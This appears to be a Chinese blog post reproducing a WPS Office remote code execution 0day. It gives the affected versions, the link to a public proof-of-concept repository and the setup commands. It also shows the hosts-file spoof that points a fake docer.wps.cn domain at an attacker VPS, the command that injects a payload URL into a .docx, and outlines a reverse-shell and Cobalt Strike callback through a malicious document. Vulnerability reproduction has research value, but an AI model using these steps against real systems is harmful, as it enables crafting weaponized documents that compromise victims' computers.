WPS-rce-0day-漏洞复现

漏洞影响

WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.12085

漏洞复习

本地复现

下载poc,需要python3.8以上的版本

1
https://github.com/ba0gu0/wps-rce

执行以下命令安装依赖文件

1
2
cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

在server文件夹下运行

1
python3 main.py

访问url

在受害主机上添加host

1
vpsip clientweb.docer.wps.cn.hackerwps.cn

因此弹出计算器的payload为

1
http://clientweb.docer.wps.cn.hackerwps.cn/calc

进入client文件夹运行

1
python main.py test.docx http://clientweb.docer.wps.cn.hackerwps.cn/calc

test是要注入payload的文档

生成带有命令的payload到目标主机上运行

成功弹出计算器

反弹shell

生成文档

开启监听

上线cs

cs启动!

开启监听

生成恶意文档

网络安全
#-漏洞复现
WPS-rce-0day-漏洞复现
http://example.com/2023/08/12/WPS-rce-0day-漏洞复现/
作者
QY
发布于
2023年8月12日
许可协议